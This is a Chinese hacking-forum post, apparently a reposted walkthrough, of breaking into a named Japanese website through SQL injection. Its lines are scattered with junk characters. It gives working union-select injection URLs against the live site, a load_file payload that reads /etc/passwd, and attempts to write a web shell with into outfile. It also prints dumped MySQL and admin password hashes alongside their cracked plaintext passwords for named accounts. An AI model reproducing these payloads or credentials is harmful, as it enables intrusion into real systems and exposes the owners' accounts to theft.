|
3 U% v* t0 b% m1 O% T1 Z7 n+ m; Q* k* ?: y
0x01. 检测 www.zuaa.jp 收集数据( U( n+ m4 {* i) o& z: Q$ G `1 e: Q
; |3 m9 k0 i- U; F$ K1 G+ V' n/ w. U9 v% o0 |
whatweb
3 o" s2 W2 J5 r9 a- Z: |; B
3 f- g; o' ~. l9 Y! S
) q8 g' @" ?) l- i利用NMAP扫描" B7 p+ O/ ]5 G' D
, G% n# i; o, k# m
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持9 a- f4 ~7 j+ x9 j5 R$ ^( d' |
0x02.找注入点
: z. U/ X( _% ^+ N, {找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
( z' x" d/ R" {% w6 J. F( ~) H! a' x- k1 Q7 q% u
4 s/ N; t2 V$ t) o9 l7 B1 ]3 \
0x03.order by
8 D& \$ K8 {$ p$ m http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
5 P# i' ^8 i' s0 R# o t
, v/ B( w; ~4 I& _order by 28报错,order by 27正常! p" ]4 z- Y2 D2 Y0 r p
0 O; _& m( t" T& v, }/ e7 J0x04. union手动查询" t9 O$ x8 J+ B( Q# [- i; N- L. J+ [
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
4 _0 H3 g8 z! t4 s F9 @2 m: N添加到 27 时正常显示
) ]( x6 }- i9 z, o/ E% H, g9 ] F7 D) S
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持. v8 M: s& n1 T
/ P) H1 D- H* ?5 e2 K8 y
0x05. info:
% e/ a1 s0 g) d) q) q8 Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
3 ^3 e: o' l) G7 F; W% R' E% v2 t5 O$ R5 L
user: root@localhost2 v3 a T: M, W- {+ T) ^
database: openpne8 Z0 o9 W4 R' }0 F6 M
version: 4.1.22
. c, k' x9 Z# o v" F$ _os: portbld-freebsd5.46 |. Z% ^. G$ A( ]
; h, ], ~ |& t+ u0x06. root用户& V6 t0 {/ v2 V
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)! B3 G' {/ K+ z1 h
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
B! }7 C& w5 n% z
. L" a1 z4 r& j3 |通过工具转换9 y$ z" _, E. N1 P/ m. f: m0 Y
: u( a% y6 ]+ O5 n/ ^/ ~: |8 R' n0 p中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
0 ? [, M" r2 j: E4 m/ f' }2 m/ B9 R% A/ e
0x07. 利用 into outfile
& |" h* L A7 L1 P1 e# {全部都失败
4 G( k- @. d; C$ |. O, ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php, Q) I6 h$ s! P. |
( A7 d* U% F1 ^$ Xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 3 U5 f. e7 X5 D6 v0 |" ?
* d& e% m& B$ p$ t7 p# ?
页面显示“MDB2 Error:syntax error”+ v0 R' W; ^) C
' o. {% }- V; p: X2 K0x08. 利用 mysql 4.1. k+ L% `9 K/ c( T( ]! y
猜常规表名,字段未果 工具 sqlmap4 g8 H3 I2 W) n' k6 k: D* M
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
. o+ P& T3 r- B) @, ^
0 W/ T! h/ W! }' D7 s
; x/ d* ]) P# X9 L" {" S( \' F+ t) |( ~1 o+ ^+ l0 k7 a
0x09. 查找后台
% ]2 X& [1 x, u0 w利用 现有的各种 后台工具尝试都不行. S( y) d+ x( h% R: F R: U- _+ h) D; q
@6 h7 Y% {+ J1 _
0x10. MySL外联方法
0 A* s. d( M r7 C从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行8 Z* W1 c) t! B. G0 P4 o' D$ D5 w
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user8 T, E( y' }& K0 ~5 `+ N
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
3 P$ H( A0 [! M$ F+ N
& U% O5 n# z" h8 ^1 M+ L这个可以在 www.cmd5.com 解密; ~8 Q9 ~1 N f7 ?1 S4 |/ l
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
/ [- \2 L! R: a' ^chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97- v3 W$ V, w+ y0 N; r' b% `
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
; @5 b) q2 t. A" C) ?$ v) @4 Kzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???& ~# K) A" b, J+ h! Q
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
+ a0 g! M3 j4 Q# n+ J! p( Q# c' x: g8 k* F5 a
( n- ?' n5 S5 Q. t; y7 v& G: V0x11. 网站突破( i1 y% D/ W$ f: ~2 l0 T5 O
发现网站的源程序 openpne, google 下载 openpne 源码8 D& f$ P# P" R0 h; j
" E0 s8 N7 M% b$ }+ W, A0 w- W( {) c: T2 ]9 e
0x12. 默认信息利用
3 R. u& O0 G* M: l3 Z4 x$ F9 xhttp://sns.zuaa.jp/?m=admin&a=page_login1 Q4 Q8 Y5 t: n
) Z, q: R; P! X6 F! e表名 (c_admin_user) ,字段名(username,password)) O0 Q+ |; F# U% o& N- N9 c" T
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
+ j+ G) w( X0 Q; p1 w* l; ~: V) b. m" N& V& w! T6 w& C
解密
" q& k& j E, |: B# {) ezuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009& L {0 l6 ^2 m
zuaajp:c0923ec5857796a393da99905008c176, zju1897% T: }, y( W. {, s
: S9 r0 o) r N( {* x0 s6 p4 L" J中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持$ U0 x L! k C/ u, f9 C' S3 R( |
4 }' H. F' h- j! S8 h+ g
0x13. 登录后台
7 F: v/ H, Z- g, [# |$ F+ O% b! x* V5 Y# G
w; g8 K+ R0 M$ |3 e
3 N& C; e' S" A, @$ \0x14. 小结3 z4 K5 }6 G$ k1 O' K% p% Q
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。2 P4 G! @0 j1 u3 h: |
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点9 I" u3 V1 n6 r5 t# w
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
! s( O: V" Y$ K7 O1 c5 V中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持0 ], j: P# G1 s
$ s# F+ B* N: z- ^) h9 c最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
0 y0 M' G9 |$ O. O j9 ~4 l+ i |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|